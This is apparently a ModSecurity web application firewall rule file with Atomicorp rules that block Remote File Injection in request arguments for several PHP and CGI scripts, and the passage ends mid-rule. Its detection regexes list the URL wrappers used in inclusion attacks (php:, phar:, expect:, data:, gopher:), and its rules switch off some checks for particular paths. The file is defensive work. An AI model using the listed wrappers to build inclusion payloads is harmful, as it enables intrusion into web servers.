modsecurity-waf/nginx-waf/10_asl_rules.conf

SecDefaultAction "log,deny,auditlog,phase:2,status:403"
SecRule REQUEST_FILENAME "/modules\.php" "phase:2,id:91044,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91045,t:none,pass,nolog,skipAfter:END_RULES_91045"

SecRule ARGS|!ARGS:/target/|!ARGS:/redirect/|!ARGS:cforms_action_page|!ARGS:storyext|!ARGS:/^config/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:message|!ARGS:/^config/|!ARGS:SitePath|!ARGS:PreviewImage|!ARGS:Exlink|!ARGS:story|!ARGS:/page/|!ARGS:user_website|!ARGS:configuration[MODULE_PAYMENT_GOOGLECHECKOUT_MODE]|!ARGS:configParams[api][configParamValue]|!ARGS:q|!ARGS:stories_topics|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:urlDecodeUni,t:lowercase,t:htmlEntityDecode,multimatch,id:340463,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/target/|!ARGS:/redirect/|!ARGS:cforms_action_page|!ARGS:storyext|!ARGS:/^config/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:message|!ARGS:/^config/|!ARGS:SitePath|!ARGS:PreviewImage|!ARGS:Exlink|!ARGS:story|!ARGS:/page/|!ARGS:user_website|!ARGS:configuration[MODULE_PAYMENT_GOOGLECHECKOUT_MODE]|!ARGS:configParams[api][configParamValue]|!ARGS:q|!ARGS:stories_topics|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340462,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91045

SecRule REQUEST_FILENAME "/installatron/index\.cgi" "phase:2,id:91046,t:none,t:lowercase,pass,nolog,noauditlog"


SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:91047,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91048,t:none,pass,nolog,skipAfter:END_RULES_91048"


#Skips
#/wp-admin/admin.php?page=w3tc_cdn
SecRule REQUEST_URI "(?:/wp-admin/admin\.php\?(?:page=(?:w3tc_cdn|ngg_other_options|wplinkdir_editlinks_page|settings|theme-options|gf_edit_forms|theme(?:-panel|_general)|wpi_page_manage_invoice|incipiens_options|layerslider|ch_header|(?:functions|under-construction)\.php|cmp-settings\.php)|frm_action=|cf/cf\.php)|^/admin\.php\?action=streambox)" "phase:2,id:'336793',rev:8,t:none,pass,nolog,noauditlog,skipAfter:END_RFI"

SecRule ARGS|!ARGS:/dt_Header/|!ARGS:/fancybox/|!ARGS:/mp3/|!ARGS:subject|!ARGS:/theme/|!ARGS:/wpcf/|!ARGS:scope|!ARGS:slide[thumbnail]|!ARGS:cancel|!ARGS:search|!ARGS:/woocommerce/|!ARGS:/calendar/|!ARGS:/image/|!ARGS:/email/|!ARGS:/fb/|!ARGS:/cmodsar_custom/|!ARGS:/^woo/|!ARGS:/^gf_/|!ARGS:/^acf/|!ARGS:u_2|!ARGS:file_remote/|!ARGS:/skype/|!ARGS:/_uri/|!ARGS:/theone/|!ARGS:/^custom/|!ARGS:/thumbnail_adr/|!ARGS:default_value|!ARGS:value|!ARGS:/lightbox/|!ARGS:/zone/|!ARGS:/cloudflare/|!ARGS:/sidebar/|!ARGS:/html/|!ARGS:/flickr/|!ARGS:/^wpcrown_/|!ARGS:/vimeo/|!ARGS:postbody|!ARGS:podcast|!ARGS:/^exposed/|!ARGS:/^ke_/|!ARGS:flickr|!ARGS:msg|!ARGS:/link/|!ARGS:/skipjs/|!ARGS:/source/|!ARGS:wordpressbling_mail|!ARGS:/^hotec/|!ARGS:pp_set_bg|!ARGS:/^item_meta/|!ARGS:solution|!ARGS:/^sapWP/|!ARGS:/^cp_/|!ARGS:dribbble|!ARGS:sugarroot|!ARGS:minify.cache.files|!ARGS:name|!ARGS:/banner/|!ARGS:/form_action/|!ARGS:/option/|!ARGS:/stream/|!ARGS:/analytics_code/|!ARGS:/endpoint/|!ARGS:_local|!ARGS:lookup|!ARGS:/hostname/|!ARGS:/cdn/|!ARGS:/^ad/|!ARGS:/image/|!ARGS:/target/|!ARGS:shrbase|!ARGS:facebook|!ARGS:/twitter/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:youtube|!ARGS:myspace|!ARGS:form|!ARGS:/_fav/|!ARGS:_gen_gmap|!ARGS:/logo/|!ARGS:/img/|!ARGS:unsubscribe|!ARGS:/^dest_to/|!ARGS:/rss/|!ARGS:/lm_slide/|!ARGS:/feed/|!ARGS:/footer/|!ARGS:/^jsfiles/|!ARGS:/include/|!ARGS:/pagination/|!ARGS:/link/|!ARGS:/image/|!ARGS:/path/|!ARGS:/page/|!ARGS:field_b|!ARGS:/refer/|!ARGS:/^gbu0_/|!ARGS:/site/|!ARGS:/button/|!ARGS:guestbookLink|!ARGS:xmlpath|!ARGS:/^update/|!ARGS:/^woo_ad/|!ARGS:act_filepath|!ARGS:/domain/|!ARGS:opphomepage|!ARGS:echi_google_analytics|!ARGS:/^echi_block_/|!ARGS:/^echi_ad/|!ARGS:/icon/|!ARGS:descripcion|!ARGS:xcont_priv|!ARGS:/comments/|!ARGS:email|!ARGS:/video/|!ARGS:hometext|!ARGS:/text/|!ARGS:web|!ARGS:/^config/|!ARGS:/^g2_manualpath/|!ARGS:/^sDescription/|!ARGS:hidepost_content_text|!ARGS:sText|!ARGS:sfhome|!ARGS:homepage|!ARGS:field_3_name|!ARGS:cforms_cmsg|!ARGS:bcontent|!ARGS:form_location|!ARGS:footer|!ARGS:field_4_name|!ARGS:cforms_redirect_page|!ARGS:cforms_action_page|!ARGS:ecards_more_pic_target|!ARGS:message|!ARGS:/^xfoot/|!ARGS:/^FCKeditor/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/redirect/|!ARGS:content|!ARGS:/linkedin/|!ARGS:outbound|!ARGS:out|!ARGS:/twitter/|!ARGS:/^field/|!ARGS:/button/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/youtube/|!ARGS:/affredir/|!ARGS:helpbox|!ARGS:return|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:thelink|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:config[latestNewsRRS]|!ARGS:sponsor|!ARGS:config[ftp_server]|!ARGS:listViewerCode|!ARGS:/element/|!ARGS:/google/|!ARGS:courier_tracking|!ARGS:/field_id/|!ARGS:/social_profile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340464,rev:58,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (admin.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/dt_Header/|!ARGS:/fancybox/|!ARGS:/mp3/|!ARGS:/email/|!ARGS:subject|!ARGS:/wpcf/|!ARGS:scope|!ARGS:cancel|!ARGS:slide[thumbnail]|!ARGS:/^hotec/|!ARGS:search|!ARGS:/^woo/|!ARGS:/calendar/|!ARGS:/theme/|!ARGS:/fb/|!ARGS:/^gf_/|!ARGS:/cmodsar_custom/|!ARGS:/^acf/|!ARGS:u_2|!ARGS:/woocommerce/|!ARGS:file_remote/|!ARGS:/skype/|!ARGS:/^custom/|!ARGS:/theone/|!ARGS:/_uri/|!ARGS:/thumbnail_adr/|!ARGS:default_value|!ARGS:value|!ARGS:/lightbox/|!ARGS:/zone/|!ARGS:/cloudflare/|!ARGS:/sidebar/|!ARGS:/html/|!ARGS:/^wpcrown_/|!ARGS:object\[submit_background\]|!ARGS:postbody|!ARGS:podcast|!ARGS:/flickr/|!ARGS:/image/|!ARGS:/vimeo/|!ARGS:page|!ARGS:msg|!ARGS:/link/|!ARGS:/skipjs/|!ARGS:/source/|!ARGS:/^ke_/|!ARGS:flickr|!ARGS:wordpressbling_mail|!ARGS:pp_set_bg|!ARGS:/^item_meta/|!ARGS:solution|!ARGS:/^sapWP/|!ARGS:/^cp_/|!ARGS:dribbble|!ARGS:sugarroot|!ARGS:minify.cache.files|!ARGS:name|!ARGS:/banner/|!ARGS:/form_action/|!ARGS:/option/|!ARGS:/button/|!ARGS:/stream/|!ARGS:/analytics_code/|!ARGS:/endpoint/|!ARGS:_local|!ARGS:lookup|!ARGS:/hostname/|!ARGS:/cdn/|!ARGS:/^ad/|!ARGS:/image/|!ARGS:/target/|!ARGS:shrbase|!ARGS:/twitter/|!ARGS:/domain/|!ARGS:linkedin|!ARGS:myspace|!ARGS:form|!ARGS:/logo/|!ARGS:/img/|!ARGS:unsubscribe|!ARGS:/^dest_to/|!ARGS:/_fav/|!ARGS:_gen_gmap|!ARGS:/rss/|!ARGS:/lm_slide/|!ARGS:/feed/|!ARGS:/footer/|!ARGS:/^jsfiles/|!ARGS:/pagination/|!ARGS:/include/|!ARGS:/link/|!ARGS:/image/|!ARGS:/logo/|!ARGS:/path/|!ARGS:/page/|!ARGS:field_b|!ARGS:/refer/|!ARGS:/^gbu0_/|!ARGS:/site/|!ARGS:guestbookLink|!ARGS:xmlpath|!ARGS:/^update/|!ARGS:/^woo_ad/|!ARGS:act_filepath|!ARGS:act_link|!ARGS:opphomepage|!ARGS:event_link|!ARGS:echi_google_analytics|!ARGS:/^echi_block_/|!ARGS:/^echi_ad/|!ARGS:/^permalink/|!ARGS:/icon/|!ARGS:descripcion|!ARGS:xcont_priv|!ARGS:email|!ARGS:/video/|!ARGS:hometext|!ARGS:/text/|!ARGS:web|!ARGS:/^config/|!ARGS:/^g2_manualpath/|!ARGS:/^sDescription/|!ARGS:hidepost_content_text|!ARGS:sText|!ARGS:homepage|!ARGS:field_3_name|!ARGS:cforms_cmsg|!ARGS:bcontent|!ARGS:form_location|!ARGS:sslloginlink|!ARGS:footer|!ARGS:field_4_name|!ARGS:cforms_redirect_page|!ARGS:ecards_more_pic_target|!ARGS:cforms_action_page|!ARGS:message/|!ARGS:/^xfoot/|!ARGS:/^FCKeditor/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/redirect/|!ARGS:content|!ARGS:q|!ARGS:/linkedin/|!ARGS:outbound|!ARGS:out|!ARGS:/twitter/|!ARGS:/^field/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/youtube/|!ARGS:helpurl|!ARGS:helpbox|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:ajaxurl|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:install_url|!ARGS:/comments/|!ARGS:resource|!ARGS:thelink|!ARGS:/affredir/|!ARGS:params[altTag]|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:config[latestNewsRRS]|!ARGS:sfhome|!ARGS:sponsor|!ARGS:config[ftp_server]|!ARGS:/element/|!ARGS:/google/|!ARGS:listViewerCode|!ARGS:/field_id/|!ARGS:/social_profile/|!ARGS:courier_tracking "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340465,rev:58,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (admin.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecMarker END_RFI



SecMarker END_RULES_91048

SecRule REQUEST_FILENAME "/cpinquiry\.php" "phase:2,id:91049,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91050,t:none,pass,nolog,skipAfter:END_RULES_91050"

SecRule ARGS|!ARGS:comments|!ARGS:content|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (cpinquiry.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:comments|!ARGS:content|!ARGS:q|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340467,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (cpinquiry.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91050

SecRule REQUEST_FILENAME "/admin/area/save-page\.php" "phase:2,id:91051,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91052,t:none,pass,nolog,skipAfter:END_RULES_91052"

SecRule ARGS|!ARGS:signature|!ARGS:website|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:page-content|!ARGS:comments|!ARGS:content|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (save-page.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:signature|!ARGS:website|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:page-content|!ARGS:comments|!ARGS:content|!ARGS:q|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340469,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (save-page.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91052

SecRule REQUEST_FILENAME "/cgi-bin/guestbook\.pl" "phase:2,id:91053,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91054,t:none,pass,nolog,skipAfter:END_RULES_91054"

SecRule ARGS|!ARGS:FOOTER|!ARGS:MESSAGE|!ARGS:header|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340470,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS 